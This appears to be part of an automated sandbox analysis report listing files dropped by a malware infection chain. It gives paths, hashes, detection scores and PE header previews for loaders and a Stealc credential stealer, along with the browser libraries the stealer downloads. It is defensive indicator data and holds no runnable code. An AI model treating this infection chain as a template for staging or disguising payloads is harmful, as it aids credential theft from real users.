File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
MD5:	0C1110E9B7BBBCB651A0B7568D796468
SHA1:	7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
SHA-256:	112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
SHA-512:	46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OFF011F112LUQGJPCDB24W.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\gold[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4329984
Entropy (8bit):	7.952276143427268
Encrypted:	false
SSDEEP:	98304:Jd07g+iFgaV7rHLvHC3mPFGA/+3K10KNbYDIVL:JzlgaxjLPHdNFNH
MD5:	9E675BBAF944EEEE4F1E7428A5B22C95
SHA1:	6714982450CC5D21B6C1DF2A0603755F6BC41D07
SHA-256:	DEDDD900CD271A593BC41F4218B1E2AAB3465F210EC92D4597C44BB79414E755
SHA-512:	A853288DB2C220B8E3FCA72A01CDC147055B58A336FC1C58120C3973462AE83D510C7DA5E1073D225E7AA122FCD3354C6E23B1D48DE9D2E24C5CC26D1D7CD2C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............................c.. ...@....@.. ................................B...`.................................:...P.....................A............................................................................................. . ... ...................... ..` .....@...,..................@..@ .....`.......D..............@..B.idata... ...........F..............@....rsrc................H..............@..@.themida. N..........Z..............`....boot.....-...c...-..Z..............`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3011584
Entropy (8bit):	6.539089461950209
Encrypted:	false
SSDEEP:	49152:mPrlDbNZ0b3OdQhNcA8gE6S42+YMXPvz9Ow:mPrlnNQ3OdQhNc08+YMjR
MD5:	FA715FFB10963C654D62D2690ACAE23D
SHA1:	1DF23F6B6E0186A44CCFD61EDA1BFBA1CA392A16
SHA-256:	71FDDFCBB9B46090AC6EB8D267996DFD3A134A63178CB4EDAE435EF6733623A9
SHA-512:	587B47BA0EDEA5701FFBA8E935ADCDAACA2897660C0C537D5D40B7FFD8C92A74FDEF9FEA6862A517183837DF121BBFB4011EBB8DF876A2996304FBD4FAEEE77A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............1...........@..........................01...........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...nnxuuolc.@+......>+.................@...fjnjtzun......0.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	7344640
Entropy (8bit):	5.917370216175585
Encrypted:	false
SSDEEP:	49152:EhuZ6dXbrEWb2JG1YdEK4pvRLPo4VVEdP9/AG9GSgpvcdrFeBhem2Y8oKUbzJ1kI:Eh9lEWn1ya9NPRqd1oGLgx6rmHKa
MD5:	BF43ACACD11D09300691CF9449C386D1
SHA1:	FF7D6F2FBAD4851CEA65811FB1F5DF83184510F5
SHA-256:	9415E13F69BCE584AA0E94BA833D689F892D27960F6B6B353F439E4AEE32B1AA
SHA-512:	170A2695AC6C918C4F3B5DA6D59B2DE4BBF454F3ABE9FE4FFB9B32314F8E4731773923FE04ACB66C31DDB47877A9DBD500D8A561532FA1A152FEB69F4A945CDB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..g...............(..E...p..2............E...@...........................p.......p...@... .............................. m.P(...........................pm.0...........................P.l......................'m.p............................text...<.E.......E.................`..`.data...`\|....E..~....E.............@....rdata..Hj...@X..l...,X.............@..@.eh_framP/....l..0....l.............@..@.bss....`1....l..........................idata..P(... m..*....l.............@....CRT....0....Pm.......l.............@....tls.........`m.......l.............@....reloc..0....pm.......l.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.339215930674792
Encrypted:	false
SSDEEP:	6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
MD5:	68A99CF42959DC6406AF26E91D39F523
SHA1:	F11DB933A83400136DC992820F485E0B73F1B933
SHA-256:	C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
SHA-512:	7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\12[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.606936732175321
Encrypted:	false
SSDEEP:	3:hMUSABn:hdB
MD5:	EA73AAD98598E9A7F10C51707D04E544
SHA1:	A33DF5835D8F08D063269967DCADB9DF0B9D0A64
SHA-256:	1CDA304D4D3E844020F6D8BED978BCCAB6BBB3CC4099F8405694D8D7F59883EA
SHA-512:	C5D637853B5665A25704CDBFA74D26D70142D966A72B85922D34E724F7644691B4B424B200C560A821C8446B5BFC9132E5D858ECCC6FB47D616C582783C08258
Malicious:	false
Reputation:	unknown
Preview:	This ip is not allowed

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Offnewhere[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	7824384
Entropy (8bit):	5.747035776604823
Encrypted:	false
SSDEEP:	49152:YomfenSX/V2zFG68rcfghczzPef7pU4Uyy2tSh4umR9+zIeah09aMDKjbaI1U2Sf:YomQ42zYrUgc/P8q4UyD4hkWzFK71
MD5:	563E12FFD633CFB480AB1F3153676D22
SHA1:	28F104D5D1336C20A99D5BC3208D74351E3D8C90
SHA-256:	B7439CB886010A0F42601044FF3B1FF2CD11873A6E16B6682CBA31E052F5865D
SHA-512:	1A2BCAA8B42A25F8A014D2549787430046814A72BAF16E798B21226B8003ABEF6A71E4831D92A90B8B810E47257BEB79E18A4C1930C2F0EA2817A2ACE8676E6C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g...............(..I..`w..2...........0I...@...........................w.....&.w...@... ..............................pt.P(............................t...............................s......................wt.p............................text.....I.......I.................`..`.data...`_...0I..`....I.............@....rdata...k...._..l...\|_.............@..@.eh_framP/....t..0....s.............@..@.bss....`1...0t..........................idata..P(...pt..*....t.............@....CRT....0.....t......Bt.............@....tls..........t......Dt.............@....reloc........t......Ft.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1853952
Entropy (8bit):	7.947344940941486
Encrypted:	false
SSDEEP:	24576:A8cvSN7BKQW3k9J2kunNUiS0DIh++xT+UnkhKRBXYSfMPYrG9SuFnmxpw/KxKOIE:ASN7BCk9J2kQUiSwI4mn4SkYPZPxH61
MD5:	79844A66D5D7D52EC7836502F3F917FC
SHA1:	66DE2AD92E97CF9F2C14B5E298472E7AA235FE4A
SHA-256:	F9319BFF5345C5585E6B7A39CAD8DE769EBBAFCA43C688EC26EFC2243B98C06E
SHA-512:	6214B4FF9193CAFDF385114FAEE74DA4F79F2573F0874B4FE1A75A7AFB9A8FDE6FF24BB3897F8D0B05DF9868E44D612489AD0D022C876FECFA8EF7F6B5A7061B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...9$.g......................$.......i...........@...........................j.....q$....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..*...%......:..............@...hbhagroj......O......<..............@...weowoivy......i......$..............@....taggant.0....i.."...(..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\myrdx[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	527360
Entropy (8bit):	7.479171546100309
Encrypted:	false
SSDEEP:	12288:GWFI4Hnedq5EL4739r+Xpph6s2V/m2CB9EKS:w4+d747NOChVnCBF
MD5:	A904AE8B26C7D421140BE930266ED425
SHA1:	C2E246B9197C18D6D40D9477A8E9A2D74A83B0E2
SHA-256:	9D3380EE1CCAAE63CA9F39E86630FFE877D0E3ECB711D87DC02350922595DC84
SHA-512:	2DBD601A564F7FFC1609BFB05ED55D57AFB9BDD9BEC1E9091DEB53FCFA9FA02A7BA59825F2B9C3777D2016D724A8263808331356F569A1ECAE585422E040F3BE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A......A...A...A..@...A..@...A..@...A..@...A...A]..A.#.@...A.#.@...A.#.@H..AM".@...AM".@...AM"zA...AM".@...ARich...A................PE..L....-.g...............)............Hd....... ....@..........................@............@.........................p...X......(...............................\|.......................................@............ ..,............................text............................... ..`.rdata..\|.... ......................@..@.data...............................@....rsrc...............................@..@.reloc..\|...........................@..B.bsp.....0.......0.......................bsp.....0.......0......................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990592
Entropy (8bit):	6.562166875320249
Encrypted:	false
SSDEEP:	49152:+yLdLzWacCDOuJ4tS3eAnaSJTRvrb3HZtpILG870CkQG+qu8:+WdLzWacC6y403znaS19rzZtpILG870f
MD5:	1BC9298F1A5A5DBC8CB6A791CA64043C
SHA1:	DC741C7745B7529E441B1C093F08EA287B2BB8E9
SHA-256:	0E4DB09BC6AE3BB5689D41DB43D9DCDF09CC2B13C8E9BCBF015F5BB7A8D2C5A9
SHA-512:	16D81C89910873B4C14FE49890B0E02FFABE26EC19789AEA74D534CBCD7BDAC084FABA91F9AB46514D528054B050928863F60666926A9ADA9B802EDAEBD4CC22
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.......-...@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...vizvkyid..........................@...ekdkgglk......0......\|-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\splwow64[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224767
Entropy (8bit):	7.973762647331916
Encrypted:	false
SSDEEP:	24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
MD5:	5D97C2475C8A4D52E140EF4650D1028B
SHA1:	DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
SHA-256:	F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
SHA-512:	22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zxcv[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1103872
